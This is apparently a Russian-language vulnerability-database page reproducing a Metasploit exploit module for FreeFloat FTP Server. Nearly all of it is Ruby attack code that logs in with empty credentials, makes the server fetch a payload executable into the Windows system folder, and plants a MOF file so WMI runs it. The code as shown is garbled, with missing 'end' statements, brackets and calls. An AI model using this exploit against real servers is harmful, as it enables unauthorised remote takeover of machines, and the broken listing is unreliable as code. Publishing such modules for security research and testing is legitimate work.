FreeFloat FTP Server Arbitrary File Upload


Дата публикации:
FreeFloat FTP Server
Тип воздействия:
Компрометация системы


# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Ftp
    include Msf::Exploit::Remote::TcpServer
    include Msf::Exploit::EXE
    include Msf::Exploit::WbemExec
    include Msf::Exploit::FileDropper

    def initialize(info={})
            'Name'           => "FreeFloat FTP Server Arbitrary File Upload",
            'Description'    => %q{
                    This module abuses multiple issues in FreeFloat: 1. No credential is actually
                needed to login; 2. User's default path is in C:\, and this cannot be changed;
                3. User can write to anywhere on the server's file system.  As a result of these
                poor implementations, a malicious user can just log in and then upload files,
                and let WMI (Management Instrumentation service) to execute the payload uploaded.
            'License'        => MSF_LICENSE,
            'Author'         =>
                    'sinn3r', # Vulnerability discovery, Metasploit module
                    'juan vazquez' # Metasploit module
            'References'     =>
                    ['URL', '';]
            'Platform'       => 'win',
            'Targets'        =>
                    ['FreeFloat', {}]
            'Privileged'     => true,
            'DisclosureDate' => "Dec 7 2012",
            'DefaultTarget'  => 0))

                # Change the default description so this option makes sense
      'SRVPORT', [true, 'The local port to listen on for active mode', 8080])
            ], self.class)

        deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password

    def check

        if banner =~ /FreeFloat/
            return Exploit::CheckCode::Vulnerable
            return Exploit::CheckCode::Safe

    def on_client_connect(cli)
        peer = "#{cli.peerhost}:#{cli.peerport}"

        case @stage
        when :exe
            print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)")
            @stage = :mof

        when :mof
            print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)")


    def upload(filename)
        select(nil, nil, nil, 1)

        peer = "#{rhost}:#{rport}"
        print_status("#{peer} - Trying to upload #{::File.basename(filename)}")

        conn = connect(false, datastore['VERBOSE'])

        print_status("#{peer} - Sending empty login...")

        res = send_user("", conn)
        if not res or res !~ /331/
            print_error("#{peer} - Error sending username")
            return false

        res = send_pass("", conn)
        if not res or res !~ /230/
            print_error("#{peer} - Error sending password")
            return false

        print_good("#{peer} - Empty authentication was successful")

        # Switch to binary mode
        print_status("#{peer} - Set binary mode")
        send_cmd(['TYPE', 'I'], true, conn)

        # Prepare active mode: Get attacker's IP and source port
        src_ip   = datastore['SRVHOST'] == '' ? Rex::Socket.source_address : datastore['SRVHOST']
        src_port = datastore['SRVPORT'].to_i

        # Prepare active mode: Convert the IP and port for active mode
        src_ip   = src_ip.gsub(/\./, ',')
        src_port = "#{src_port/256},#{src_port.remainder(256)}"

        # Set to active mode
        print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
        send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

        # Tell the FTP server to download our file
        send_cmd(['STOR', filename], false, conn)


    def exploit

        exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10)+5)}.exe"
        mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
        @mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
        @exe      = generate_payload_exe
        @stage = :exe

            t = framework.threads.spawn("reqs", false) {
                # Upload our malicious executable
                u = upload(exe_name)
                # Upload the mof file
                upload(mof_name) if u